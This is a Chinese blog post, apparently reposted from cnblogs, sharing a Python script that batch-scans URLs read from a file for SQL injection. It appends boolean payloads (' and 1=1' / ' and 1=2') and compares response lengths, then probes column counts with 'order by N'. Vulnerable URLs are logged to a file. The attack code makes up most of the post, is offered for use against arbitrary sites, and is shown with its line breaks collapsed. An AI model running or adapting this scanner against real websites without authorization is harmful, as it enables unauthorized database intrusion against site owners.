python批量检测注入点脚本-白红宇

python批量检测注入点脚本

阅读量：5342 次

发布时间：2019-06-15

本文共 3163 字，大约阅读时间需要 10 分钟。

# -*- coding:utf-8 -*-def logo():    print ("                                               ***                  ")    print ("                                             *     *                ")    print ("                    author:                 *       *               ")    print ("                            Screw            *                      ")    print ("                                              *****                 ")    print ("                                                   *                ")    print ("                                            *       *               ")    print ("                   blog:                     *     *                ")    print ("                                               ***                  ")    print ("                        http://www.cnblogs.com/pojun/               ")#运行环境python3.0   批量的话,在本目录建一个url.txt文件将注入点导入。    import threading    import requestsi=0err='true'exp=[' and 1=1',' and 1=2']chang=[]new_str=""#判断注入点def judge():        for i in range(2):        request=url+exp[i]        try:            respons1=len(requests.get(request).text)        except:            print(u"网站有waf,连接被重置！")            exit()        chang.append(respons1)    if(chang[1]!=chang[0]):         print(u'网站======>存在注入!')         field(url)    else:         print(u'网站=======>" 不 "存在注入!')#判断字段(field)def field(weburl):    j=0    a1=""    a2=""    while j<30:        j+=1        if(j%2!=0):            request=weburl+" order by "+str(j)            try:                a1=len(requests.get(request,timeout=1).text)            except:                pass        else:            request=weburl+" order by "+str(j)            try:                a2=len(requests.get(request,timeout=1).text)            except:                print(u"网站有waf,连接被重置！")        if(a1!=a2 and j>1):            print(u"字段数为========================>",j-1)            break #批量def piliang():        str=open('url.txt',encoding="utf-8").read()    a=str.split('\n')    url_num=len(a)    for i1 in range(url_num-1):        chang=[]        print (a[i1])        for i2 in range(2):            request=a[i1]+exp[i2]            try:                respons1=len(requests.get(request,timeout=1).text)            except:                global err                err='false'                print(u"网站有waf,连接被重置！")                break            if err=='true':                chang.append(respons1)        if err=='true':                    if(chang[1]==chang[0]):                print(u'网站========>" 不 "存在注入!')            else:                print(u'网站========>存在注入!')                # field(a[i1])                new_str=a[i1]+'\n'                o=open('ture_sql.txt','a')                o.write(new_str)                        err='true'         print(u'1.批量注入,存在本目录的1.txt  2.单点注入,并判断字段数 ')id=int(input("ID? :"))if(id==1):    t1=threading.Thread(target=piliang)    t1.start()    t1.join()    elif(id==2):    url=input('url :')    judge()    t2=threading.Thread(target=field,args=(url,))    t2.join()    else:    print(u"输入错误！")logo()

本脚本是在自己学完python练手的第一个脚本,所以结构比较混乱,但是效果还是不错的。基本没有误报!

转载于:https://www.cnblogs.com/pojun/p/7302246.html

你可能感兴趣的文章

WPF：从WPF Diagram Designer Part 1学习控件模板、移动、改变大小和旋转